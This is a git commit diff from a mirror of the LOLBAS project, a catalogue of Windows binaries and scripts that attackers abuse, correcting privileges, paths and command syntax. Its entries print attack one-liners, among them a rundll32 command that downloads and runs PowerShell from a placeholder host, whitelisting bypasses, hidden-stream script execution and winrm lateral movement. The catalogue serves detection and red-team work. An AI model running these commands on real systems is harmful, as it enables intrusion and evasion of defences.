public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-28 15:58:24 +01:00
Code Issues Projects Releases Wiki Activity

Fixing various issues identified

Browse Source
This commit is contained in:
Wietze 2021-12-14 16:50:22 +00:00
parent adf171d089
commit 6793a7d238
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
17 changed files with 30 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSBinaries/Cscript.yml
View File

@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS

3
yml/OSBinaries/Hh.yml
View File

@ -19,8 +19,7 @@ Commands:
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
- Path: C:\Windows\hh.exe
Code_Sample:
- Code:
Detection:

2
yml/OSBinaries/Infdefaultinstall.yml
View File

@ -8,7 +8,7 @@ Commands:
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:

2
yml/OSBinaries/Netsh.yml
View File

@ -8,7 +8,7 @@ Commands:
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:

2
yml/OSBinaries/Odbcconf.yml
View File

@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User

3
yml/OSBinaries/Regedit.yml
View File

@ -19,8 +19,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe
- Path: C:\Windows\regedit.exe
Code_Sample:
- Code:
Detection:

8
yml/OSBinaries/Regsvcs.yml
View File

@ -8,19 +8,19 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection:

2
yml/OSBinaries/Rundll32.yml
View File

@ -18,7 +18,7 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute

10
yml/OSBinaries/Vbc.yml
View File

@ -5,19 +5,19 @@ Author: Lior Adar
Created: 2020-02-27
Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Description of the second command
Usecase: A description of the usecase
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe

2
yml/OSBinaries/Wscript.yml
View File

@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: wscript c:\ads\file.txt:script.vbs
- Command: wscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: ADS

2
yml/OSBinaries/Xwizard.yml
View File

@ -19,7 +19,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Usecase: Download file from Internet
Category: Download
Privileges: User

2
yml/OSLibraries/Advpack.yml
View File

@ -15,7 +15,7 @@ Commands:
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
Privileges: Admin
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll

12
yml/OSLibraries/Ieadvpack.yml
View File

@ -10,35 +10,35 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
Privileges: Admin
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\ieadvpack.dll
- Path: c:\windows\syswow64\ieadvpack.dll

2
yml/OSLibraries/Shell32.yml
View File

@ -4,7 +4,7 @@ Description: Windows Shell Common Dll
Author:
Created: 2018-05-25
Commands:
- Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
Description: Launch a DLL payload by calling the Control_RunDLL function.
Usecase: Load a DLL payload.
Category: Execute

2
yml/OSScripts/CL_LoadAssembly.yml
View File

@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute

2
yml/OSScripts/UtilityFunctions.yml
View File

@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()'
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute

4
yml/OSScripts/Winrm.yml
View File

@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10, Windows 11
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase: Proxy execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1216
OperatingSystem: Windows 10, Windows 11
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'